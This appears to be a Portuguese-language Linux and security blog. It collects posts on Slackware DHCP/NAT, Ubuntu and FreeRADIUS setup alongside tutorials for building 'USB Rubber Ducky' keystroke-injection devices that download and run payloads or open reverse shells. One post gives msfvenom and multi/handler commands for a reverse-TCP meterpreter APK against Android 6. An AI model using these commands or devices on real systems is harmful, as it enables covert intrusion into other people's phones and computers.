ARDUINO PRO MICRO – ‘USB RUBBER DUCKY’ – V 1.0

0
Pro Micro

Pessoal, vamos aqui dar uma olhadinha em alguns pontos do nosso vídeo sobre o Arduino Pro Micro…
Como eu já havia dito no Artigo sobre o Digispark eu faria algo sobre o Arduino, bem similar porém por se tratar de um dispositivo de maior performance, não quando falamos de processamento, mas em diversos outros fatores, inclusive pela aplicação.
Certo, que o vídeo tenha sido de alguma valia e eu acredito que tenha sido, eu vou aqui abordar alguns assuntos que não foram abordados no vídeo pois o deixaria com um tamanho muito grande e até cansativo para todos nós. Ok?

 

Um dos Tópicos que gostaria de abordar, porém não tive oportunidade era sobre as especificações do Pro-Micro. Então, deixo para vocês o link do datasheet do carinha.

https://cdn.sparkfun.com/datasheets/Dev/Arduino/Boards/ProMicro16MHzv1.pdf

 

Outros que eram para ter sido debatido era as instruções dos códigos usados, e rapaz, se você já tem algum conhecimento não terá alguma dificuldade, mas caso não tenha eu realmente reforço o que disse no vídeo, leia um pouco sobre.

O primeiro código:

No primeiro código que escrevi, e enviei ao Arduino no vídeo nós realizamos uma simples execução, abrir um navegador e depois abrir um site, especificamente o prefirolinux.com.
Este foi o código(primeiro) usado por mim no vídeo.

Depois disso, mostrei um código um pouco maior, também realizei a conexão ao kali e de forma clara acredito ter falado um pouco sobre o Arduino Reverse Shell Generator( ).
Este por sua vez, facilitou muito o processo realizado naquele instante, claro, não temos obrigatoriamente que criar todos os arquivos usando o shell generator.

Bom, depois de baixar o Programa e fazer todo aquele processo, faltará o código, e isso pode ser encontrado abaixo.

 

Este código, está configurado de forma a acessar um server especifico e abrir a shell.txt.

Caso for usar este código, faça as devidas alterações no link onde está hospedada sua shell… 😀

Com isso, basta seguir o passo a passo do vídeo e não terá como dar errado.

Para a mudanças de caracteres, farei um mapa das modificações em um post a parte e agradeço a todos pela visita.
Amanhã ou depois irei upar um novo vídeo, com mais recursos e novidades.

 

Abraços e até mais!! 😉

 

Configurando um Servidor Slackware – DHCP server, Nat com iptables simplificado.

1

Amigos, mais uma vez é um prazer imensuravel estar por aqui e poder compartilhar um pouco do meu conhecimento com essa grande comunidade.

Vamos configurar um Slackware para servir internet e DHCP ?
O video aborda as configurações basicas necessarias para que possamos ter nosso firewall funcinando. Este video será o primeiro de uma serie que farei a respeito do sistema, então vamos lá.

 

[ x ]
 

 

Configurações usadas por mim neste video.

dnsmasq.conf:

Primeiro, faça um backup das configurações atuais.

cd /etc/

mv dnsmasq.conf dnsmasq.conf.bkp

nano dnsmasq.conf

Adicione as linhas em cinza abaixo ou crie as regras de acordo com suas necessidades.
#ARQUIVO DE CONFIGURAÇÃO DHCP SERVER
#DECLARAR ABAIXO A INTERFACE A SER USADA
interface=eth1
#<IP INICIAL>,<IP FNAL>,<MASK>.<LEASE>
dhcp-range=10.22.33.100,10.22.33.120,255.255.255.0,12h
#GATEWAY PADRÃO
dhcp-option=3,10.22.33.1
#SERVIDORES DNS
dhcp-option=6,10.22.33.1
#SERVIDOR DE NOME – SUFIXO DNS
dhcp-option=15,slack-video.prefirolinux.com
#
dhcp-authoritative

rc.firewall
Siga os comandos para a criação do script

cd /etc/rc.d

nano rc.firewall e adicione as seguintes linhas destacadas em vermelho:

#!/bin/bash
iptables -P FORWARD ACCEPT
iptables -A POSTROUTING -t nat -s 10.22.33.0/24 -o eth0 MASQUERADE

 

[ x ]
 

Ao final dos procedimentos, dar permissão de execução aos seguintes arquivos.

rc.firewall – rc.dnsmasq – rc.ip_forward

Para tal use, chmod +x <nome do script>.

Bom, isso é tudo por enquanto .

Abraços e até a proxima !!

 

Ativando o MinimizeOnClick no Launcher do Ubuntu 16.04

0

Olá pessoal.

Vou ensinar a vocês como ativar a opção de minimizar os aplicativos abertos no Launcher do unity. Lembrem-se que esta opção só funciona legal quando se tem uma única sessão do aplicativo aberta.

Em primeiro lugar, para conseguir habilitar esta opção, precisaremos de um app chamado unity-tweak-tool. Para instalar, executamos o comando:

sudo apt install unity-tweak-tool

OBS: Na versão 16.04 do Ubuntu, o comando “apt-get” foi “reduzido” para apenas “apt”, porém vai da sua preferência, todos os dois funcionam perfeitamente.

Feita a instalação do app, clicamos sobre o botão “Pesquisar no seu computador” ou simplesmente apertamos a tecla Super (não é Iniciar… rs) e procuramos pelo nome unity-tweak-tool, conforme print abaixo:

utt

Com o app aberto, clique na opção “Lançador”.

launcher

Na tela que se abriu, marque a flag “Minimize single window applications on click”.

moc

E o resultado será este…

unity-launcher

 

Pronto…! 😀

 

Fonte: OMG Ubuntu!

DIGISPARK ATTINY85: CRIANDO UM MINI ‘USB RUBBER DUCKY’

0
Ducky ;)

Pessoal, hoje como de costume quero mais uma vez pedir desculpas pelo site ter ficado fora do Ar, e agradecer imensamente ao Amigo e companheiro de Portal Filipe Coelho por ter rapidamente revertido a situação qual nos encontrávamos.

Com todas as desculpas devidamente upadas e carregadas vamos ao processo de descobertas e testes que sempre realizamos.

Pra ser sincero, essa área de microcontroladores nunca foi minha praia, eu tinha uma certa resistência em tentar aprender sobre, visto que; Sou portador de uma síndrome Frenética que me faz perder o foco e concentração e com meus estudos voltado ao Python(já era estudos do .PY) eu realmente receava perder o foco e aderir a incansável rotina de começar algo sem terminar.

Mas, pouco a pouco vou superando meus desequilíbrios mentais e construindo uma ponte entre o meu ‘eu’ e o ‘saber’. E isso é muito legal, nos faz perder o foco mas ganhar conhecimento, perder a data mas ganhar o dia entre vários outros pontos.

O tal de Filipe a alguns meses havia me presenteado com um Arduino Nano3, bichinho que hoje uso na construção de um carrinho para meu filho. E até então não havia brincado com ele, mas me vi na oportuna necessidade de adquirir um Arduino Pro-Micro(que basicamente usei pra mesma coisa do Digispark, porém com mais recursos) e ai então começou a saga em busca do aperfeiçoamento e dos meus objetivos, aliás, o Pro-Micro será em breve destaque de um artigo por aqui, por enquanto vamos nos focar(se é que consigo) no Digispark.

Bom, para quem não conhece, o bichinho é esse abaixo:

 

Attiny85
Attiny85

Pode ser facilmente encontrado no Mercado Livre e eu indico esse vendedor pois além de um preço bom tem muito cuidado, produtos confiáveis e muita atenção.
http://produto.mercadolivre.com.br/MLB-876073237-attiny85-attiny-85-digispark-kickstarter-usb-atmel-arduino-_JM
Precisaremos para esse projeto de :

  • 1 Digispark conforme referenciado acima

  • Muita paciência e calma, objetivos e criatividade, afinal, você decide o que quer fazer né?

Pois, com o Digispark Devidamente em mãos eu usei o IDE do Arduino (https://www.arduino.cc/en/Main/Software), na versão 1.8 .

Após baixar e instalar conforme seu sistema (plataforma) nós incluiremos as bibliotecas referentes a Digispark para que assim possamos escrever e enviar nossos códigos para o dispositivo.

Fiz esse pequeno vídeo(Pra quem não sabe instalar as bibliotecas isso vale a pena.) somente para servir de referência como funciona esse processo, e o link usado no vídeo é ‘ ESSE’ .

Após seguir todos os passos já podemos prosseguir com a criação dos códigos para nosso brinquedo. Eu aconselho ler alguma documentação para saber ou ter no mínimo a noção de que caminho seguir(Para que não usou ainda) para entender os comandos e etc que são usados pelo sistema.

No caso aqui eu usei para baixar um arquivo .EXE quando ‘espetado’ em computadores que rodem Windows, mas obviamente pode ser adaptado ao Linux e outros.

Por se tratar de um dispositivo que ‘simula’ a ação de um teclado(HID-Dispositivo físico e de entrada – HUMAN INTERFACE DEVICE ) e por estar devidamente especificado no meu código, então ao espetar o dispositivo em um computador ele será reconhecido como teclado, iniciará a execução dos códigos. E como eu fui bem específico e já disse, vou baixar um arquivo executável de uma URL qualquer(usei como teste pra esse vídeo um server local, mas poderia estar hospedado em algum lugar em algum servidor) e com a ajuda do superseguro POWERSHELL da M$ eu vou executar esse arquivo.

O detalhe fica por conta da sua imaginação, competência para criar o payload (no caso né) visto que o fato de ter um dispositivo de confiança ou HID executando as ações não significa eventual omissão do AV em relação ao arquivo. Se for um payload que seja de fácil detecção então meu amigo, tenha certeza que você pode até entrar numa fria, por tanto, todos os passos aqui descritos são apenas para fins de estudos e conhecimentos sobre as ferramentas usadas. Muito Cuidado e mesmo assim Todo cuidado ainda é pouco!

Após baixarmos e instalamos as Bibliotecas dos contribuidores, escrever o código com alguma objetividade, verificar a compilação é chegada a hora de upar esse código(compilar e etc..) a nosso brinquedo. Por tanto eu fiz mais um pedacinho de vídeo, também sem áudio apenas descrevendo as ações bem lentamente para que seja de fácil acompanhamento.

Lembrem-se: Cada passo de uma vez, primeiro baixar a IDE, A Bibli…, escrever o código, testar o sketch, verificar se o tamanho não é superior ao permitido pelo dispositivo e claro, o último e mais bacana mas não menos importante: Fazer todos os testes antes de sair bancando o Elliot (leia-se MR. Robot 😀 ) por ai.

Feito isso, bom, tenho abaixo um teste do meu em execução e dando acesso a uma máquina.

 

Link para baixar o Codigo AQUI!

Qualquer dúvida, fale conosco, envie e-mail, faça um comentário, ajudem a manter esse site vivo para que não fiquemos somente sugando o Filipe pô. Afinal, não somos de ficar noticiando coisas mas temos bastante conhecimento e experiência a compartilhar. Falta incentivo da parte de vocês!

Abraços, até mais…!

By…

Thiago F. Cruz

FreeRadius Advanced Using Mysql for Mikrotik: PPPOE server + mysql ippool, login user, nas, configuration radius , control user simultaneous, Control user Mac Address and Queue in MK.

0

Fala pessoal, segunda parte do vídeo, e aqui vamos dar sequência as configurações avançadas do Freeradius.

Parte 1 Configurando Servidor Freeradius + Mysql para pppoe no Mikrotik

Neste vídeo, vamos trabalhar de forma diferente do primeiro, aliás, é interessante que você tenha visto o primeiro para que possamos entender as mudanças nas configurações em relação a ele.

Então, vejam o vídeo, no mais alguns dos comandos usados estão disponíveis logo a baixo e eu estou atualizando esse post (infelizmente estou com um problema no nervo do braço esquerdo e quase não estou conseguindo digitar, então irei atualizando calmamente isso. OK?)

 

 

 

 

Os comandos usados neste vídeo foram:

root@mysql /# mysql -uroot -pThiago123
mysql> create database radius;

mysql> grant all privileges on radius.* to radius@localhost identified by 'Thiago123'

mysql> \q
Bye

Importando as databases, ou scripts que já vem preconfigurados com o freeradius:


root@mysql /# mysql -uroot -pThiago123 radius < /etc/freeradius/sql/mysql/schema.sql
root@mysql /# mysql -uroot -pThiago123 radius < /etc/freeradius/sql/mysql/nas.sql
root@mysql /# mysql -uroot -pThiago123 radius < /etc/freeradius/sql/mysql/ippool.sql  

 



Alterar o radusergroup:

 

Alimentar as Tabelas :



 

Exploit Android 6 usando MSFvenom (Kali 2.2016)

0

Gente, nesse video eu mostro como com poucos comandos você pode explorar um Android na versão 6.0.
O video não tem intenção de ensinar ou induzir ninguém a invadir a privacidade de terceiros, mas sim demonstrar que falhas podem ser exploradas.

Usei apenas o msfvenom sem opções de encoder, arquitetura ou outros, basicamente apenas um exploit gerado pelo kali e que me deu acesso de forma reversa ao Android.
Aparelho : Moto G segunda Geração com android 6.0 com ultima atualização de segurança instalado.

Comandos usado neste video…
Criar o exploit, substitua ip pelo seu ip, porta pela devida porta e de o nome do app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORTA -o app.apk

Para estabelecer conexão :
msfconsole

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost IP_KALI

set lport porta

exploit -j ou run ou somente exploit

Bom, por hoje é só, logo mais mostro como deixar este exploit como algo que inicia todas as vezes que o dispositivo for ligado, obtendo assim um acesso monstro ao Android….rsrs
abraços

 

 

 

ARDUINO PRO MICRO + CARTÃO DE MEMORIA = USB RUBBER DUCKY COM EXCELENTES FUNCIONALIDADES

0

Imagine você com R$34,00 criar uma ferramenta bem semelhante ao Usb Rubber Ducky que hoje é vendido no Brasil por no minimo R$500. Agora imagine que nós iremos ver como fazer isso de uma forma simples, pratica e bem funcional.

 

Assunto de Hoje: Transforme seu Pro micro em uma poderosíssima ferramenta de testes de intrusão.
Com o dólar lá nas alturas e até mesmo com o interesse em criar você mesmo novas ferramentas as vezes somos colocados frente a situações que acabamos por economizar muitos ‘Termes'(R$). Além claro de passar divertidos momentos brincando com aquilo que mais gostamos.

Veja o Vídeo:

Nesse tutorial/Artigo/Receita de bolo nós iremos ver como fazer isso. Aconselho ver o vídeo para melhor entendimento do assunto abordado, pois lá eu tento dar detalhes do uso e simplifico as ações realizadas para construir esse brinquedinho.

 


Para isso precisaremos de:

  1. Arduino Pro Micro
  2. Leitor/Adaptador de cartão SD
  3. Um cartão Micro SD.

Com o material em mãos, a parte mais chata é realizar a soldagem, eu pelo menos por ter um problema nos nervos dos braços estou tremendo muito, o que me impede de realizar uma soldagem cirúrgica. Porém, por menos bonito que seja ainda assim consigo fazer alguns itens se tornarem funcionais.

Nesse caso, iremos ligar o Arduino diretamente ao leitor/adaptador de cartão, a sequencia de solda para os pinos são:

Sequencia

Depois de realizar a solda dos devidos pinos a seus respectivos pares devemos realizar um teste para verificar se tudo correu bem. Caso sim, ai iremos para o próximo passo.

Para fazer o teste eu indico que você use o seguinte código, esse disponível diretamente do Arduino.CC .

Segue o código:

Se após enviar o código para o Arduino e ele gravar no seu cartão SD um arquivo(como o default do cod.) chamado ‘TESTE.TXT e nele escrever a seguinte linha: “testing 1, 2, 3.” então, todos os seus passos anteriores foram feitos com sucesso e já pode ir para a próxima etapa.
Importante observar a linha 16, onde está :   if (!SD.begin(4)) {

Se feito de acordo com a sequencia de conexão acima então, obrigatoriamente deve-se usar o pino 10 onde está a atribuição do valor 4. Caso tenha usado o 4, nada precisa ser mudado.

 

Nesta Etapa daremos inicio a compilação do codigo que será o interpretador dos nossos scripts.
Para isso, basta entrarmos em : https://github.com/Seytonic/Duckduino-microSD e posteriormente clonar ou fazer download do projeto que está disponível. Algo bem semelhante a :
$git clone https://github.com/Seytonic/Duckduino-microSD.git

Após isso, entre no diretório recém criado, dentro dele vá em Duckduino-microSD e veja que só existe um arquivo, este com o nome de Duckduino-microSD.ino

 

Feito os passos acima, abra o IDE do Arduino, procure pelo arquivo .ino baixado e abra para que possa compilar e enviar ao Arduino. Feito isso, só precisaremos de entender agora como irá funcionar o nosso Sistema.

O Arduino então está programado para realizar a interpretação de comandos pre-estabelecidos e que estejam em um arquivo que é referenciado no código carreado.

 

Assim que conectamos o cabo ao pc, o arduino faz a leitura do arquivo no cartão, interpreta e executa isso.
Ou seja, o nosso Arduino é praticamente um USB R. Ducky, só temos menos processamento, mas na pratica o funcionamento é 90% ou mais similar.
Para que possamos fazer os scripts nós deveremos seguir uma sintaxe bem diferente da apresentada no vídeo anterior, desta vez usaremos praticamente o que é usado no próprio Rubber, ou seja, poderemos com pequenas alterações fazer com que nosso arduino execute as centenas de códigos já disponíveis, ou, criar os nossos próprios. Isso irá variar com certeza.
Um código usado por mim que tem basicamente a mesma função do outro vídeo é:

Para testar numa live, acesse, http://seytonic.com.
Caso deseje pode também clonar direto na sua maquina, o link para download é o seguinte:
https://github.com/Nurrl/Duckuino

Vejam só o quanto ele diminui de tamanho. Fica muito show 😉

Bom, agora o que nos resta é copiar esse código para o cartão de memoria. Após copiar para o cartão você espeta no leitor/adaptador e com um cabo USB apropriado, conectar ao PC.

Esse modelo de executar os scripts simplifica e ao mesmo tempo facilita e muito a criação e edição dos nossos ‘programas’. Isso é muito simples, funcional e pratico.
Link para os scripts já existentes do USB Rubber Ducky : https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

 

Então pessoal, é isso.
Até a próxima.